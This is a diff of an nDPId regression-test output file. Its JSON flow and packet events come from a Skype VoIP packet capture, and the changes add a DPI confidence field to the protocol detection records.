+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA54bUAAEARt2bAqAEinTeCljLdnEcAJaaFewkCIUNJcqobuUolNpafXbellV+EM\/ULmpysjyw="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":722,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.150","src_port":13021,"dst_port":40007,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAABBP+oAAEARp7DAqAEinTg0DzLdnFsALYwJewsCVNeDMJHHK\/Dt9HVlBuPPBbINu9bDjb8MSpCCrsrjyd0TEg=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.15","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0mUYAAEARls7AqAEinTfrojLdnGEAICOXew0CZW2\/4VtO8SUcLK6ApfNDe+uaEMsE"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":724,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6nacAAEARXcXAqAEib91NnzLdnF8AJrQGew8Ci4JWnsKyT6r3gHVnkQ4+dXrvzbvknlDqGmE\/"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":725,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.159","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1431970653869,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970653869,"pkt":"0NQSxnP1PBXCt3IOCABFAABB8NoAAEARcG\/AqAEiQAQXlDLdnF0ALRa1exECrGOk9zKZhpR5Z4LrruV\/92iAsqS9CAawX8X4D80kRASy7Q=="}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":726,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970653869,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6wW8AAEARn+fAqAEiQAQXjjLdnFcAJg\/KexMCQ3jYuEugpNmWmUQtEzO7LdTOeKZd1ItpRQQC"}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":730,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.142","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03zwAAEARghzAqAEiQAQXkjLdgQkAIIDZexUCZ4W5ZqoZlNOePqUvRCFg3WRtDoC9"}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":731,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/GZwAAEARf3vAqAEinTeClTLdnEsAK1wIexcCaeXnH1khWR2dVjoEFgFOwJFG48UKy+DykqMrgwb0UzA="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":732,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.149","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABBOycAAEARwEbAqAEib91NlzLdnF0ALQ\/xexkCYPXpRAQdHH0\/jNHVbGCv27qhgsGUdDsPAuuhBF8LGQtOxA=="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":733,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1431970654821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970654821,"pkt":"0NQSxnP1PBXCt3IOCABFAABAm5UAAEARk+DAqAEi1cezpTLdnEQALDM7exsCCwiB5Tp\/+eOgtAg8Bibngtvk3Z9waqj3cY7b3c6tDEmT"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":734,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970654821,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyDf8AAEARix7AqAEinTeCnDLdnFMAHh0Aex0Cxk3n0hRKPcgDeocb540rNGApyA=="}
